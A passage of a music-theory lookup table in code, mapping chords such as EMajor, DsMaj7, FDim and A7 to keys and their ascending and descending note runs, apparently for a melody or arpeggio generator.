'EMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'DMajor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
},
'DsMaj7': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'GMajor': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'BMajor': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'BMinor': {
'BMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'FsMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'GMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'EMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'AMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'DMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
},
'EMinor': {
'CMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'BMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'GMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'EMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'AMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'DMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
},
'CsMaj7': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'FDim': {
'DsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'F'], ['B', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['B', 'C', 'D', 'Ds'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['B', 'Gs', 'G'] ] ],
'FsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'F'], ['B', 'As', 'Gs'] ] ],
},
'DMinor': {
'CMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'DMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'FMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'AsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'GMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'AMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
},
'FMajor': {
'CMajor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
'DMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'FMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AsMajor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'GMinor': [ [ ['F', 'G', 'A'], ['A', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['A', 'G', 'F'], ['C', 'As', 'A'] ] ],
'AMinor': [ [ ['F', 'G', 'A'], ['A', 'B', 'C'], ['C', 'D', 'E', 'F'] ], [ ['F', 'E', 'D', 'C'], ['A', 'G', 'F'], ['C', 'B', 'A'] ] ],
},
'ADim': {
'AsMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'Ds'], ['C', 'As', 'A'], ['Ds', 'D', 'C'] ] ],
'GMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'Ds'], ['C', 'As', 'A'], ['Ds', 'D', 'C'] ] ],
},
'CMinor': {
'GsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'DsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'AsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'FMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CHMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'B', 'C'] ], [ ['C', 'B', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'GMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
},
'EDim': {
'DMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'As'], ['G', 'F', 'E'], ['As', 'A', 'G'] ] ],
'FMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'As'], ['G', 'F', 'E'], ['As', 'A', 'G'] ] ],
},
'CsMajor': {
'GsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'CsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'AsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'DsMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
'FMinor': [ [ ['Cs', 'Ds', 'F'], ['F', 'G', 'Gs'], ['Gs', 'As', 'C', 'Cs'] ], [ ['Cs', 'C', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'G', 'F'] ] ],
'FsMajor': [ [ ['Cs', 'Ds', 'F'], ['F', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['F', 'Ds', 'Cs'], ['Gs', 'Fs', 'F'] ] ],
},
'A7': {
'BMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'CsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'FsMinor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'AMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
'EMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs', 'A'] ], [ ['A', 'Gs', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'Ds', 'Cs'] ] ],
'DMajor': [ [ ['A', 'B', 'Cs'], ['Cs', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['Cs', 'B', 'A'], ['E', 'D', 'Cs'] ] ],
},
'Fm7': {
'GsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CsMajor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'DsMajor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'AsMinor': [ [ ['F', 'Fs', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'Fs', 'F'], ['C', 'As', 'Gs'] ] ],
'FMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds', 'F'] ], [ ['F', 'Ds', 'Cs', 'C'], ['Gs', 'G', 'F'], ['C', 'As', 'Gs'] ] ],
'CHMinor': [ [ ['F', 'G', 'Gs'], ['Gs', 'B', 'C'], ['C', 'D', 'Ds', 'F'] ], [ ['F', 'Ds', 'D', 'C'], ['Gs', 'G', 'F'], ['C', 'B', 'Gs'] ] ],
},
'DsMajor': {
'GsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'CMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'DsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'AsMajor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
'FMinor': [ [ ['Ds', 'F', 'G'], ['G', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'Gs', 'G'] ] ],
'GMinor': [ [ ['Ds', 'F', 'G'], ['G', 'A', 'As'], ['As', 'C', 'D', 'Ds'] ], [ ['Ds', 'D', 'C', 'As'], ['G', 'F', 'Ds'], ['As', 'A', 'G'] ] ],
},
'E7': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'C7': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'GsMinor': {
'CsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'GsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'BMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'DsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'EMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['Ds', 'D', 'C'] ] ],
'FsMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
},
'CMaj7': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'GMaj7': {
'CMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'BMinor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
'GMajor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'EMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'CHMinor': [ [ ['G', 'Gs', 'B'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
'AMinor': [ [ ['G', 'A', 'B'], ['B', 'C', 'D'], ['D', 'E', 'F', 'G'] ], [ ['G', 'F', 'E', 'D'], ['B', 'A', 'G'], ['D', 'C', 'B'] ] ],
'DMajor': [ [ ['G', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'G'] ], [ ['G', 'Fs', 'E', 'D'], ['B', 'A', 'G'], ['D', 'Cs', 'B'] ] ],
},
'GsMaj7': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
